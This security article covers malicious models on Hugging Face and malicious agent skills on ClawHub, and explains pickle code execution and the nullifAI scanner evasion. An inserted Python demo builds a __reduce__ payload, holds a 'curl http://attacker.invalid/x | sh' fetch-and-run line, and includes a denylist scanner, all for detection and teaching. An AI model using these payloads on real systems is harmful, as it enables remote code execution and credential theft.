Hugging Face and ClawHub Compromised: A Warning for the AI Industry
The AI industry’s model and agent-skill repositories now carry hundreds of malicious entries. The infrastructure built to accelerate development has become a vector for compromising it.
TL;DR
Hugging Face, the repository hosting over a million machine learning models used by countless AI companies globally, and ClawHub, the public registry for OpenClaw’s AI agent skills, have been systematically infiltrated with hundreds of malicious entries. These range from stealing credentials to opening backdoors and hijacking AI agents for cryptocurrency mining.
The Compromises
Both platforms were hit by distinct campaigns that share one underlying pattern: each exploits the implicit trust developers place in shared repositories, where downloading an artifact usually also means executing it.
Hugging Face:
Since at least 2024, security firms JFrog and ReversingLabs have identified models on Hugging Face carrying hidden backdoors. The scale has since become clearer: Protect AI, which partners with Hugging Face to scan uploaded models, reported roughly 352,000 unsafe or suspicious findings across 51,700 models, and over 100 models have been found capable of arbitrary code execution on load. The root cause is Python’s pickle serialisation format, still used by PyTorch checkpoints: a pickle stream can instruct the deserialiser to import and call any function, so merely loading a model file can run attacker code. A technique dubbed “nullifAI” shows how such payloads slip past scanners. The model files are compressed with 7z instead of the ZIP format PyTorch normally writes, so ZIP-oriented scanners never open them, and the pickle stream inside is deliberately broken after the payload: a scanner that gives up on malformed input reports nothing, while Python’s loader has already executed the payload by the time it reaches the break.
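The following is an added example written for this page, not code from the article or from Hugging Face, Protect AI, JFrog or ReversingLabs. It shows how a pickle checkpoint gets code execution through `__reduce__`, a minimal opcode-level scanner in the spirit of Picklescan, and the two evasion points described above: a stream that is cut off after its payload, and a 7z container in place of PyTorch’s ZIP. The denylist, the `archive/data.pkl` layout and the `created-by-unpickling` path are assumptions chosen for the demo; every input is constructed inline and nothing here contacts the network.

```python
"""Added example, not code from the article or from Hugging Face / Protect AI / JFrog /
ReversingLabs: how a pickle checkpoint gets code execution, a minimal opcode scanner in
the spirit of Picklescan, and the two nullifAI evasions (broken stream, 7z container).
Standard library only; every input below is constructed here."""
import io, os, pickle, pickletools, shutil, tempfile, zipfile
from dataclasses import dataclass, field

# Imports with no business in a model checkpoint.  Assumption: a short denylist is
# enough for the demo; real scanners carry far longer lists and are still incomplete.
DANGEROUS_GLOBALS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"), ("subprocess", "Popen"),
    ("subprocess", "run"), ("builtins", "exec"), ("builtins", "eval"),
    ("builtins", "__import__"), ("runpy", "run_path"), ("socket", "socket"),
}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "UNICODE", "STRING", "BINSTRING", "SHORT_BINSTRING"}
ZIP_MAGIC = b"PK\x03\x04"               # torch.save() writes a ZIP archive
SEVENZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"  # what the nullifAI samples were packed as


class Payload:
    """Any object can turn unpickling into a function call: __reduce__ names the callable."""
    def __init__(self, func, arg):
        self.func, self.arg = func, arg
    def __reduce__(self):
        return (self.func, (self.arg,))

def build_malicious_pickle(cmd="id", func=os.system, protocol=3):
    """Pickle that runs func(cmd) on load.  Never pickle.loads() this with os.system."""
    return pickle.dumps(Payload(func, cmd), protocol=protocol)

@dataclass
class ScanResult:
    container: str                        # "pickle", "zip" or "7z"
    dangerous: list = field(default_factory=list)
    parse_error: bool = False
    @property
    def safe(self):
        # "Could not parse" and "could not open" are not evidence of safety.
        return self.container != "7z" and not self.dangerous and not self.parse_error

def scan_pickle(data):
    """Walk the opcode stream without executing it and flag denylisted imports."""
    result, strings = ScanResult("pickle"), []
    try:
        for op, arg, _pos in pickletools.genops(data):
            ref = None
            if op.name == "GLOBAL":                         # protocol <= 3: "module name"
                ref = tuple(arg.split(" ", 1))
            elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
                ref = (strings[-2], strings[-1])            # protocol 4+: two pushed strings
            elif op.name in STRING_OPS:
                strings.append(arg)
            if ref in DANGEROUS_GLOBALS:
                result.dangerous.append(ref)
    except Exception:
        # Broken stream: the payload opcodes precede the break, so what was flagged is
        # real, and the failure to parse is itself a finding, not a clean result.
        result.parse_error = True
    return result

def scan_model_file(data):
    """Triage a checkpoint blob by container, then scan every pickle inside it."""
    if data.startswith(SEVENZIP_MAGIC):
        return ScanResult("7z")           # a ZIP-only scanner would skip this silently
    if not data.startswith(ZIP_MAGIC):
        return scan_pickle(data)          # bare pickle (.pkl or legacy torch format)
    result = ScanResult("zip")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".pkl"):
                inner = scan_pickle(zf.read(name))
                result.dangerous += inner.dangerous
                result.parse_error |= inner.parse_error
    return result

def make_torch_style_zip(pkl_bytes):
    """Constructed stand-in for the torch.save() layout: pickle at archive/data.pkl."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", pkl_bytes)
    return buf.getvalue()

def truncated_stream_still_executes():
    """pickle.loads() runs REDUCE before it notices the stream is cut off.  os.makedirs on
    a temp path stands in for os.system as a visible but harmless side effect."""
    target = os.path.join(tempfile.mkdtemp(), "created-by-unpickling")
    stream = build_malicious_pickle(target, func=os.makedirs)[:-1]   # drop the STOP opcode
    try:
        pickle.loads(stream)
        raised = False
    except Exception:                     # EOFError: Ran out of input
        raised = True
    executed = os.path.isdir(target)
    shutil.rmtree(os.path.dirname(target), ignore_errors=True)
    return raised, executed

if __name__ == "__main__":
    bad = build_malicious_pickle("curl http://attacker.invalid/x | sh")  # built, never loaded
    for label, blob in [("bare", bad), ("zip", make_torch_style_zip(bad)),
                        ("7z", SEVENZIP_MAGIC + b"\x00" * 26), ("broken", bad[:-1])]:
        print(label, scan_model_file(blob))
    print("broken stream raised, executed:", truncated_stream_still_executes())
```

Two design choices matter more than the denylist itself. First, a parse failure is reported as a finding rather than as "nothing found", which is the gap the broken-stream trick relied on. Second, a container the scanner cannot open is treated as unsafe rather than skipped. Even so, a denylist can only catch imports someone thought of; the durable fix is to stop executing code at load time altogether, for example by distributing weights in a non-executable format such as safetensors and loading pickle checkpoints only from sources you would also trust to run a script.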
ClawHub:
A coordinated campaign seeded ClawHub with 341 malicious AI agent skills built to steal credentials, open reverse shells and mine cryptocurrency on the host running the agent.
The Impact
Security researchers have documented malicious models that give an attacker direct access to the user's machine, steal credentials, exfiltrate sensitive data or download further malware. Because loading a model is a routine step, a data scientist who pulls what appears to be a legitimate checkpoint can unwittingly hand control of their workstation, and every credential cached on it, to an attacker.
Responses
Hugging Face has partnered with JFrog and Wiz to strengthen scanning of uploaded models, and JFrog reports that its integration has cut false positives in malicious model detection substantially (to 4%). Scanning, however, is reactive, and the nullifAI case shows it can be bypassed by format tricks alone. The open, anyone-can-upload architecture that makes Hugging Face valuable to the AI community is also what makes it an attractive distribution channel for attackers.